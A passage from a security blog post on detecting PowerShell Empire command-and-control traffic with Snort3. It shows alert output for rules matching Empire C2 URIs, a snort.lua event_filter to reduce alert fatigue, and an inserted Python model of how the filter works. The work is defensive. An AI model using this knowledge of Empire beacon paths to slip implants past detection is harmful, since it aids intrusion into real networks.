<span style="color: white;">[**] [1:4000001:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected" [**]</span>
<span style="color: white;">11/20-13:03:59.632367 </span>
<span style="color: white;">[**] [1:4000002:10] "POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected" [**]</span>
<span style="color: white;">11/20-13:04:02.701119 </span>
<span style="color: white;">[**] [1:4000003:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected" [**]</span>
<span style="color: white;">11/20-13:05:06.697538 </span>
<span style="color: white;">[**] [1:4000004:10] "POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected" [**]</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the Talos format, <i>alert_talos</i>:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_talos --talos --pcap-show -k none -d -R local.rules -c snort.lua -q | more </span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">##### empire-full-session.pcap #####</span>
<span style="color: white;"> [1:4000001:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000002:10] POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000003:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected (alerts: 452)</span>
<span style="color: white;"> [1:4000004:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected (alerts: 377)</span>
<span style="color: white;">#####</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the above, I like <i>alert_talos</i>, as it gives me a summary of the alerts rather than printing every alert to the screen. Good job Talos!</div><div><br /></div><div>Taking a final pass, when snort is run without the -q option and with the -v option, we see:</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_talos --talos --pcap-show -k none -d -R local.rules -c snort.lua -v</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">o")~ Snort++ 3.1.18.0</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Loading snort.lua:</span>
<span style="color: white;">Loading /usr/local/etc/snort/snort_defaults.lua:</span>
<span style="color: white;">Finished /usr/local/etc/snort/snort_defaults.lua:</span>
<span style="color: white;"> Lua Allowlist Keywords for snort.lua:</span>
<span style="color: white;"> default_classifications, default_ftp_server, default_gtp,</span>
<span style="color: white;"> default_hi_port_scan, default_js_norm_built_in_ident, default_low_port_scan,</span>
<span style="color: white;"> default_med_port_scan, default_references, default_smtp, default_variables,</span>
<span style="color: white;"> default_wizard, ftp_command_specs, gtp_v0_info, gtp_v0_msg, gtp_v1_info,</span>
<span style="color: white;"> gtp_v1_msg, gtp_v2_info, gtp_v2_msg, http_methods, icmp_hi_sweep,</span>
<span style="color: white;"> icmp_low_sweep, icmp_med_sweep, ip_hi_decoy, ip_hi_dist, ip_hi_proto,</span>
<span style="color: white;"> ip_hi_sweep, ip_low_decoy, ip_low_dist, ip_low_proto, ip_low_sweep,</span>
<span style="color: white;"> ip_med_decoy, ip_med_dist, ip_med_proto, ip_med_sweep, netflow_versions,</span>
<span style="color: white;"> sip_requests, smtp_default_alt_max_command_lines, tcp_hi_decoy, tcp_hi_dist,</span>
<span style="color: white;"> tcp_hi_ports, tcp_hi_sweep, tcp_low_decoy, tcp_low_dist, tcp_low_ports,</span>
<span style="color: white;"> tcp_low_sweep, tcp_med_decoy, tcp_med_dist, tcp_med_ports, tcp_med_sweep,</span>
<span style="color: white;"> telnet_commands, udp_hi_decoy, udp_hi_dist, udp_hi_ports, udp_hi_sweep,</span>
<span style="color: white;"> udp_low_decoy, udp_low_dist, udp_low_ports, udp_low_sweep, udp_med_decoy,</span>
<span style="color: white;"> udp_med_dist, udp_med_ports, udp_med_sweep</span>
<span style="color: white;"> hosts</span>
<span style="color: white;"> so_proxy</span>
<span style="color: white;"> stream_tcp</span>
<span style="color: white;"> packets</span>
<span style="color: white;"> alerts</span>
<span style="color: white;"> host_tracker</span>
<span style="color: white;"> http_inspect</span>
<span style="color: white;"> binder</span>
<span style="color: white;"> wizard</span>
<span style="color: white;"> stream_ip</span>
<span style="color: white;"> search_engine</span>
<span style="color: white;"> profiler</span>
<span style="color: white;"> ips</span>
<span style="color: white;"> trace</span>
<span style="color: white;"> classifications</span>
<span style="color: white;"> active</span>
<span style="color: white;"> host_cache</span>
<span style="color: white;"> decode</span>
<span style="color: white;"> stream</span>
<span style="color: white;"> process</span>
<span style="color: white;"> output</span>
<span style="color: white;"> network</span>
<span style="color: white;"> daq</span>
<span style="color: white;">Finished snort.lua:</span>
<span style="color: white;">Loading rule args:</span>
<span style="color: white;">Loading local.rules:</span>
<span style="color: white;">Finished local.rules:</span>
<span style="color: white;">Finished rule args:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">rule counts</span>
<span style="color: white;"> total rules loaded: 4</span>
<span style="color: white;"> text rules: 4</span>
<span style="color: white;"> option chains: 4</span>
<span style="color: white;"> chain headers: 2</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">port rule counts</span>
<span style="color: white;"> tcp udp icmp ip</span>
<span style="color: white;"> dst 3 0 0 0</span>
<span style="color: white;"> total 3 0 0 0</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">ips policies rule stats</span>
<span style="color: white;"> id loaded shared enabled file</span>
<span style="color: white;"> 0 4 0 4 snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">service rule counts to-srv to-cli</span>
<span style="color: white;"> http: 4 4</span>
<span style="color: white;"> http2: 4 4</span>
<span style="color: white;"> total: 8 8</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">fast pattern service groups to-srv to-cli</span>
<span style="color: white;"> key: 2 2</span>
<span style="color: white;"> header: 2 2</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">search engine</span>
<span style="color: white;"> instances: 8</span>
<span style="color: white;"> patterns: 16</span>
<span style="color: white;"> pattern chars: 212</span>
<span style="color: white;"> num states: 204</span>
<span style="color: white;"> num match states: 16</span>
<span style="color: white;"> memory scale: KB</span>
<span style="color: white;"> total memory: 14.2461</span>
<span style="color: white;"> pattern memory: 0.824219</span>
<span style="color: white;"> match list memory: 2.09375</span>
<span style="color: white;"> transition memory: 10.3281</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Flow Tracking</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream:</span>
<span style="color: white;"> ip_frags_only: disabled</span>
<span style="color: white;"> max_flows: 476288</span>
<span style="color: white;"> max_aux_ip: 16</span>
<span style="color: white;"> pruning_timeout: 30</span>
<span style="color: white;"> ip_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> tcp_cache: { idle_timeout = 3600, cap_weight = 11000 }</span>
<span style="color: white;"> udp_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> icmp_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> user_cache: { idle_timeout = 180, cap_weight = 0 }</span>
<span style="color: white;"> file_cache: { idle_timeout = 180, cap_weight = 32 }</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Network Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Inspection Policy : policy id 0 : snort.lua</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">binder:</span>
<span style="color: white;"> bindings:</span>
<span style="color: white;"> { when = { proto = tcp, ports = 80 443 },</span>
<span style="color: white;"> use = { type = http_inspect } }</span>
<span style="color: white;"> { when = { service = http },</span>
<span style="color: white;"> use = { type = http_inspect } }</span>
<span style="color: white;"> { when = { },</span>
<span style="color: white;"> use = { type = wizard } }</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">http_inspect:</span>
<span style="color: white;"> request_depth: -1 (unlimited)</span>
<span style="color: white;"> response_depth: -1 (unlimited)</span>
<span style="color: white;"> unzip: enabled</span>
<span style="color: white;"> normalize_utf: enabled</span>
<span style="color: white;"> decompress_pdf: disabled</span>
<span style="color: white;"> decompress_swf: disabled</span>
<span style="color: white;"> decompress_zip: disabled</span>
<span style="color: white;"> decompress_vba: disabled</span>
<span style="color: white;"> script_detection: disabled</span>
<span style="color: white;"> normalize_javascript: disabled</span>
<span style="color: white;">max_javascript_whitespaces: 200</span>
<span style="color: white;"> js_normalization_depth: -1</span>
<span style="color: white;"> js_norm_identifier_depth: 65536</span>
<span style="color: white;"> js_norm_max_tmpl_nest: 32</span>
<span style="color: white;">js_norm_max_bracket_depth: 256</span>
<span style="color: white;"> js_norm_max_scope_depth: 256</span>
<span style="color: white;"> percent_u: disabled</span>
<span style="color: white;"> utf8: enabled</span>
<span style="color: white;"> utf8_bare_byte: disabled</span>
<span style="color: white;"> iis_unicode: disabled</span>
<span style="color: white;"> iis_unicode_code_page: 1252</span>
<span style="color: white;"> iis_double_decode: enabled</span>
<span style="color: white;"> oversize_dir_length: 300</span>
<span style="color: white;"> backslash_to_slash: enabled</span>
<span style="color: white;"> plus_to_space: enabled</span>
<span style="color: white;"> simplify_path: enabled</span>
<span style="color: white;"> xff_headers: x-forwarded-for true-client-ip</span>
<span style="color: white;">request_body_app_detection: enabled</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">so_proxy:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream_ip:</span>
<span style="color: white;"> max_frags: 8192</span>
<span style="color: white;"> max_overlaps: 0</span>
<span style="color: white;"> min_frag_length: 0</span>
<span style="color: white;"> min_ttl: 1</span>
<span style="color: white;"> policy: windows</span>
<span style="color: white;"> session_timeout: 60</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream_tcp:</span>
<span style="color: white;"> flush_factor: 0</span>
<span style="color: white;"> max_pdu: 16384</span>
<span style="color: white;"> max_window: 0</span>
<span style="color: white;"> no_ack: disabled</span>
<span style="color: white;"> overlap_limit: 0</span>
<span style="color: white;"> policy: windows</span>
<span style="color: white;"> queue_limit: { max_bytes = 4194304, max_segments = 3072 }</span>
<span style="color: white;"> reassemble_async: enabled</span>
<span style="color: white;"> require_3whs: 300</span>
<span style="color: white;"> session_timeout: 180</span>
<span style="color: white;"> small_segments: { count = 0, maximum_size = 0 }</span>
<span style="color: white;"> track_only: disabled</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">wizard:</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">pcap DAQ configured to read-file.</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">host_cache</span>
<span style="color: white;"> memcap: 8388608 bytes</span>
<span style="color: white;">Commencing packet processing</span>
<span style="color: white;">++ [0] empire-full-session.pcap</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">Instance 0 daq pool size: 256</span>
<span style="color: white;">Instance 0 daq batch size: 64</span>
<span style="color: white;">##### empire-full-session.pcap #####</span>
<span style="color: white;"> [1:4000001:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000002:10] POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected (alerts: 3)</span>
<span style="color: white;"> [1:4000003:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected (alerts: 452)</span>
<span style="color: white;"> [1:4000004:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected (alerts: 377)</span>
<span style="color: white;">#####</span>
<span style="color: white;">-- [0] empire-full-session.pcap</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Packet Statistics</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">daq</span>
<span style="color: white;"> pcaps: 1</span>
<span style="color: white;"> received: 17365</span>
<span style="color: white;"> analyzed: 17365</span>
<span style="color: white;"> allow: 17365</span>
<span style="color: white;"> rx_bytes: 6929587</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">codec</span>
<span style="color: white;"> total: 17365 (100.000%)</span>
<span style="color: white;"> discards: 1610 ( 9.272%)</span>
<span style="color: white;"> eth: 17365 (100.000%)</span>
<span style="color: white;"> ipv4: 17365 (100.000%)</span>
<span style="color: white;"> tcp: 13785 ( 79.384%)</span>
<span style="color: white;"> udp: 1970 ( 11.345%)</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Module Statistics</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">binder</span>
<span style="color: white;"> raw_packets: 3580</span>
<span style="color: white;"> new_flows: 78</span>
<span style="color: white;"> service_changes: 4</span>
<span style="color: white;"> no_match: 4</span>
<span style="color: white;"> inspects: 3658</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">detection</span>
<span style="color: white;"> analyzed: 17365</span>
<span style="color: white;"> key_searches: 1314</span>
<span style="color: white;"> header_searches: 2204</span>
<span style="color: white;"> alerts: 835</span>
<span style="color: white;"> total_alerts: 835</span>
<span style="color: white;"> logged: 835</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">http_inspect</span>
<span style="color: white;"> flows: 25</span>
<span style="color: white;"> scans: 4397</span>
<span style="color: white;"> reassembles: 4399</span>
<span style="color: white;"> inspections: 3956</span>
<span style="color: white;"> requests: 1286</span>
<span style="color: white;"> responses: 464</span>
<span style="color: white;"> get_requests: 1253</span>
<span style="color: white;"> post_requests: 33</span>
<span style="color: white;"> request_bodies: 33</span>
<span style="color: white;"> max_concurrent_sessions: 6</span>
<span style="color: white;"> pipelined_flows: 10</span>
<span style="color: white;"> pipelined_requests: 491</span>
<span style="color: white;"> total_bytes: 898244</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">normalizer</span>
<span style="color: white;"> test_tcp_block: 3</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">search_engine</span>
<span style="color: white;"> max_queued: 2</span>
<span style="color: white;"> total_flushed: 1318</span>
<span style="color: white;"> total_inserts: 1318</span>
<span style="color: white;"> total_unique: 1318</span>
<span style="color: white;"> non_qualified_events: 483</span>
<span style="color: white;"> qualified_events: 835</span>
<span style="color: white;"> searched_bytes: 335622</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream</span>
<span style="color: white;"> flows: 78</span>
<span style="color: white;"> total_prunes: 23</span>
<span style="color: white;"> idle_prunes: 23</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">stream_tcp</span>
<span style="color: white;"> sessions: 78</span>
<span style="color: white;"> max: 78</span>
<span style="color: white;"> created: 78</span>
<span style="color: white;"> released: 69</span>
<span style="color: white;"> timeouts: 7</span>
<span style="color: white;"> instantiated: 9</span>
<span style="color: white;"> setups: 78</span>
<span style="color: white;"> discards_skipped: 3</span>
<span style="color: white;"> events: 12</span>
<span style="color: white;"> syn_trackers: 69</span>
<span style="color: white;"> segs_queued: 7414</span>
<span style="color: white;"> segs_released: 7414</span>
<span style="color: white;"> segs_used: 3224</span>
<span style="color: white;"> rebuilt_packets: 4029</span>
<span style="color: white;"> rebuilt_buffers: 20</span>
<span style="color: white;"> rebuilt_bytes: 1064009</span>
<span style="color: white;"> gaps: 47</span>
<span style="color: white;"> client_cleanups: 29</span>
<span style="color: white;"> server_cleanups: 10</span>
<span style="color: white;"> syns: 69</span>
<span style="color: white;"> syn_acks: 29</span>
<span style="color: white;"> resets: 54</span>
<span style="color: white;"> fins: 13</span>
<span style="color: white;"> inspector_fallbacks: 5</span>
<span style="color: white;"> partial_fallbacks: 22</span>
<span style="color: white;"> max_segs: 816</span>
<span style="color: white;"> max_bytes: 410007</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">wizard</span>
<span style="color: white;"> tcp_scans: 4</span>
<span style="color: white;"> tcp_hits: 4</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">Summary Statistics</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">timing</span>
<span style="color: white;"> runtime: 00:00:00</span>
<span style="color: white;"> seconds: 0.073711</span>
<span style="color: white;"> pkts/sec: 17365</span>
<span style="color: white;"> Mbits/sec: 52</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">module profile (all, depth 255, sorted by total_time)</span>
<span style="color: white;"># module layer checks time(us) avg/check %/caller %/total</span>
<span style="color: white;">= ====== ===== ====== ======== ========= ======== =======</span>
<span style="color: white;"> 1 other 1 17365 26070 1 36.73 36.73</span>
<span style="color: white;"> 2 stream_tcp 1 13785 16034 1 22.59 22.59</span>
<span style="color: white;"> 3 daq 1 17638 9925 0 13.98 13.98</span>
<span style="color: white;"> 4 http_inspect 1 16750 4542 0 6.40 6.40</span>
<span style="color: white;"> 5 mpse 1 53710 4029 0 5.68 5.68</span>
<span style="color: white;"> 6 rule_eval 1 18036 2855 0 4.02 4.02</span>
<span style="color: white;"> 7 decode 1 17365 2236 0 3.15 3.15</span>
<span style="color: white;"> 8 stream 1 15755 1919 0 2.70 2.70</span>
<span style="color: white;"> 9 eventq 1 25798 1613 0 2.27 2.27</span>
<span style="color: white;"> 10 paf 1 10990 1427 0 2.01 2.01</span>
<span style="color: white;"> 11 binder 1 3662 313 0 0.44 0.44</span>
<span style="color: white;"> 12 wizard 1 4 8 2 0.01 0.01</span>
<span style="color: white;">-- total -- 17365 70977 4 -- 100.00</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">rule profile (all, sorted by total_time)</span>
<span style="color: white;"># gid sid rev checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends</span>
<span style="color: white;">= === === === ====== ======= ====== ========= ========= ========= ============= ======== ========</span>
<span style="color: white;">1 1 4000003 10 472 452 452 4310 9 9 0 0 0</span>
<span style="color: white;">2 1 4000004 10 398 377 377 4139 10 10 0 0 0</span>
<span style="color: white;">3 1 4000002 10 436 3 3 375 0 38 0 0 0</span>
<span style="color: white;">4 1 4000001 10 12 3 3 308 25 86 5 0 0</span>
<span style="color: white;">o")~ Snort exiting</span>
</pre></div>
</div><div><br /></div><div><div>Looking at the summary above, one rule fired 452 times and another 377 times. The two rules with 3 alerts each we can live with. Those 300+ and 400+ alert counts, however, are a real headache for an analyst and contribute to the so called <i>alert fatigue</i>. Note that the volume reflects the traffic rather than a sloppy rule: every GET for <i>/admin/get.php</i> and <i>/login/process.php</i> is a match (the <i>http_inspect</i> stats show 1253 GET requests in this pcap), so the goal is to thin the alerts, not the detection. Let's reduce this noise ... and the fatigue.</div><div><br /></div><div>Let's add the following <i>event_filter</i> to the <i>snort.lua</i> file. With <i>type = 'both'</i>, <i>count = 1</i> and <i>seconds = 60</i>, each rule alerts on the first match from a given source address and stays silent for the rest of that 60 second window. Tracking <i>by_src</i> matters here: it keeps one alert per compromised host, whereas tracking by destination would collapse every host talking to the same C2 listener into a single window.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">event_filter =</span>
<span style="color: white;">{</span>
<span style="color: white;"> -- alert on the first match from a source, then ignore further matches from it for the rest of the 60 second window.</span>
<span style="color: white;"> { gid = 1, sid = 4000001, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000002, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000003, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;"> { gid = 1, sid = 4000004, type = 'both', track = 'by_src', count = 1, seconds = 60},</span>
<span style="color: white;">}</span>
</pre></div>
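Before rerunning Snort, it helps to see what those four lines actually do. The following is an added example, written here for this post and not code from the original article or from the Snort project: it models the documented event_filter semantics (type limit, threshold or both; track by_src or by_dst; count; seconds) in Python and runs them over a constructed stream of rule matches shaped like the Empire traffic above, one agent beaconing GET /admin/get.php every 5 seconds for 3 minutes, a second agent that checks in once, and three POST /news.php matches. The hosts, timestamps and the 10.0.0.0/24 and 192.0.2.0/24 addresses are made up. It also shows why by_src is the right choice here: tracked by_dst, both compromised hosts share one window and the second host's check-in is silently swallowed.

```python
"""Model of how a Snort3 event_filter thins alerts (added example, not Snort code)."""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Alert:
    ts: float   # seconds since the start of the capture (constructed)
    gid: int
    sid: int
    src: str
    dst: str


@dataclass
class EventFilter:
    """One entry of the Lua event_filter table."""
    gid: int
    sid: int
    type: str      # 'limit', 'threshold' or 'both'
    track: str     # 'by_src' or 'by_dst'
    count: int
    seconds: int
    # per tracked address: (start of the current window, matches seen in it)
    _state: Dict[str, Tuple[Optional[float], int]] = field(default_factory=dict, repr=False)

    def to_lua(self) -> str:
        """Render this filter as a line of the snort.lua event_filter table."""
        return ("{ gid = %d, sid = %d, type = '%s', track = '%s', count = %d, seconds = %d },"
                % (self.gid, self.sid, self.type, self.track, self.count, self.seconds))

    def allow(self, a: Alert) -> bool:
        """True if the match should be logged, False if the filter eats it."""
        key = a.src if self.track == "by_src" else a.dst
        start, n = self._state.get(key, (None, 0))
        if start is None or a.ts - start >= self.seconds:
            start, n = a.ts, 0          # window expired: open a new one at this event
        n += 1
        if self.type == "limit":        # log the first `count` matches per window
            fire = n <= self.count
        elif self.type == "threshold":  # log every `count`-th match; window restarts on fire
            fire = n >= self.count
            if fire:
                start, n = a.ts, 0
        elif self.type == "both":       # log once per window, after `count` matches
            fire = n == self.count
        else:
            raise ValueError("unknown event_filter type: %s" % self.type)
        self._state[key] = (start, n)
        return fire


def apply_filters(filters: List[EventFilter], stream: List[Alert]) -> List[Alert]:
    """Pass a stream of rule matches through the filters; returns what gets logged."""
    by_rule = {(f.gid, f.sid): f for f in filters}   # Snort3 allows one filter per gid:sid
    logged = []
    for a in sorted(stream, key=lambda x: x.ts):
        f = by_rule.get((a.gid, a.sid))
        if f is None or f.allow(a):
            logged.append(a)
    return logged


def summarize(alerts: List[Alert]) -> Dict[Tuple[int, int], int]:
    """Per gid:sid counts, like the '(alerts: N)' lines printed by -A alert_talos."""
    out: Dict[Tuple[int, int], int] = {}
    for a in alerts:
        out[(a.gid, a.sid)] = out.get((a.gid, a.sid), 0) + 1
    return out


C2 = "192.0.2.10"   # constructed address of the Empire listener


def constructed_stream() -> List[Alert]:
    """Constructed matches: agent 10.0.0.5 beacons GET /admin/get.php (sid 4000003) every 5 s
    for 3 minutes, agent 10.0.0.7 checks in once, and 10.0.0.5 POSTs to /news.php (sid 4000002)
    three times."""
    s = [Alert(t, 1, 4000003, "10.0.0.5", C2) for t in range(0, 180, 5)]
    s.append(Alert(10, 1, 4000003, "10.0.0.7", C2))
    s += [Alert(t, 1, 4000002, "10.0.0.5", C2) for t in (1, 3, 200)]
    return s


def run(track: str, ftype: str = "both", count: int = 1) -> Dict[Tuple[int, int], int]:
    """Apply the post's filter (60 s window) to both Empire rules with the given settings."""
    filters = [EventFilter(1, sid, ftype, track, count, 60) for sid in (4000002, 4000003)]
    return summarize(apply_filters(filters, constructed_stream()))


if __name__ == "__main__":
    print("unfiltered:", summarize(constructed_stream()))
    for track in ("by_src", "by_dst"):
        print(track + ":", run(track))
    print(EventFilter(1, 4000003, "both", "by_src", 1, 60).to_lua())
```

Running it prints the unfiltered counts (37 matches for sid 4000003, 3 for sid 4000002), then the filtered counts: tracked by_src the beaconing host produces one alert per 60 second window plus one for the second host, tracked by_dst the second host never surfaces at all. The model follows the README description of limit, threshold and both; Snort's own implementation may differ in corner cases such as a match landing exactly on a window boundary.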
</div><div><br /></div><div><div>When Snort3 is run against the pcap, this time we see</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(root💀securitynik)-[~/packets]</span>
<span style="color: white;">└─# snort --pcap-list empire-full-session.pcap -A alert_talos --talos --pcap-show -k none -d -R local.rules -c snort.lua -q</span>
<span style="color: white;">Reading network traffic from "empire-full-session.pcap" with snaplen = 1518</span>
<span style="color: white;">##### empire-full-session.pcap #####</span>
<span style="color: white;"> [1:4000001:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /news.php detected (alerts: 1)</span>
<span style="color: white;"> [1:4000002:10] POWERSHELL EMPIRE COMPROMISED HOST: POST request made for /news.php detected (alerts: 1)</span>
<span style="color: white;"> [1:4000003:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /admin/get.php detected (alerts: 1)</span>
<span style="color: white;"> [1:4000004:10] POWERSHELL EMPIRE COMPROMISED HOST: GET request made for /login/process.php detected (alerts: 1)</span>
<span style="color: white;">#####</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">module profile (all, depth 255, sorted by total_time)</span>
<span style="color: white;"># module layer checks time(us) avg/check %/caller %/total</span>
<span style="color: white;">= ====== ===== ====== ======== ========= ======== =======</span>
<span style="color: white;"> 1 other 1 17365 29039 1 39.42 39.42</span>
<span style="color: white;"> 2 stream_tcp 1 13785 15494 1 21.03 21.03</span>
<span style="color: white;"> 3 daq 1 17638 10463 0 14.20 14.20</span>
<span style="color: white;"> 4 http_inspect 1 16750 4428 0 6.01 6.01</span>
<span style="color: white;"> 5 mpse 1 53704 4115 0 5.59 5.59</span>
<span style="color: white;"> 6 rule_eval 1 18033 2923 0 3.97 3.97</span>
<span style="color: white;"> 7 stream 1 15755 2240 0 3.04 3.04</span>
<span style="color: white;"> 8 decode 1 17365 2203 0 2.99 2.99</span>
<span style="color: white;"> 9 paf 1 10989 1419 0 1.93 1.93</span>
<span style="color: white;"> 10 eventq 1 25792 994 0 1.35 1.35</span>
<span style="color: white;"> 11 binder 1 3662 336 0 0.46 0.46</span>
<span style="color: white;"> 12 wizard 1 4 7 1 0.01 0.01</span>
<span style="color: white;">-- total -- 17365 73666 4 -- 100.00</span>
<span style="color: white;">--------------------------------------------------</span>
<span style="color: white;">rule profile (all, sorted by total_time)</span>
<span style="color: white;"># gid sid rev checks matches alerts time (us) avg/check avg/match avg/non-match timeouts suspends</span>
<span style="color: white;">= === === === ====== ======= ====== ========= ========= ========= ============= ======== ========</span>
<span style="color: white;">1 1 4000003 10 472 452 1 4786 10 10 0 0 0</span>
<span style="color: white;">2 1 4000004 10 398 377 1 3933 9 10 0 0 0</span>
<span style="color: white;">3 1 4000002 10 436 3 1 366 0 38 0 0 0</span>
<span style="color: white;">4 1 4000001 10 12 3 1 311 25 82 7 0 0</span>
</pre></div>
</div><div><br /></div><div><div>This is much better. Keep in mind that the filter only hides events, it does not change what the rule matches: in the rule profile the <i>matches</i> column still reads 452 and 377, only <i>alerts</i> dropped to 1, so the detection itself is untouched and only the reporting is thinned. From an analyst's perspective, we would much rather not suffer alert fatigue.</div><div><br /></div><div>This is the end of this post. See you in the next one, where we use Zeek to detect this activity.</div><div><br /></div><div><p><b>Other posts in this series:</b><br /></p><p><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-attack-in.html" target="_blank">Beginning Powershell Empire - The Attack in 10 steps</a><br /><a href="Beginning PowerShell Empire - Log Analysis" target="_blank">Powershell Empire Log Analysis</a><br /><a href="https://www.securitynik.com/2022/02/beginning-powershell-empire-packet.html" target="_blank">Powershell Empire Packet Analysis</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-snort3.html" target="_blank">Powershell Empire Detection with Snort</a><br /><a href="https://www.securitynik.com/2022/02/powershell-empire-detection-with-zeek.html" target="_blank">Powershell Empire - Detection with Zeek</a></p></div><div><br /></div><div><br /></div><div>References:</div><div><a href="https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html">https://www.securitynik.com/2021/02/snort3-on-ubuntu-20-initial-setup.html</a></div><div><a href="https://www.youtube.com/watch?v=W1pb9DFCXLw&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-">https://www.youtube.com/watch?v=W1pb9DFCXLw&list=PLpPXZRVU-dX33VNUeqWrMmBNf5FeKVmi-</a></div><div><a href="https://github.com/threatstream/snort/blob/master/etc/classification.config">https://github.com/threatstream/snort/blob/master/etc/classification.config</a></div><div><a href="https://snort.org/faq/readme-filters">https://snort.org/faq/readme-filters</a></div><div><a href="https://www.snort.org/downloads">https://www.snort.org/downloads</a></div></div><div><br /></div>Nik Alleyne, MSc | CISSP | GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com1